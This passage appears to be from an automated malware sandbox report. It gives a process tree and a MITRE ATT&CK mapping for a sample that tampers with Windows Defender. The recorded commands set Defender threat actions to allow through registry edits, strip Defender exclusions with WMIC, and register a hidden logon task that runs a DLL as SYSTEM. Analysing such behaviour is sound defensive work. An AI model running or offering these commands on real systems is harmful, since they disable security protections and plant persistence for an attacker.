  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3580
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2996
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2400
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4724
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4788
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2700
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1000
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3048
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4104
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:2208
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4060
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2512
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4296
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3840
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3288
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"
  2⤵
  PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4948
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4564
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:196
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\ZyZqGA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4228

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4116

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery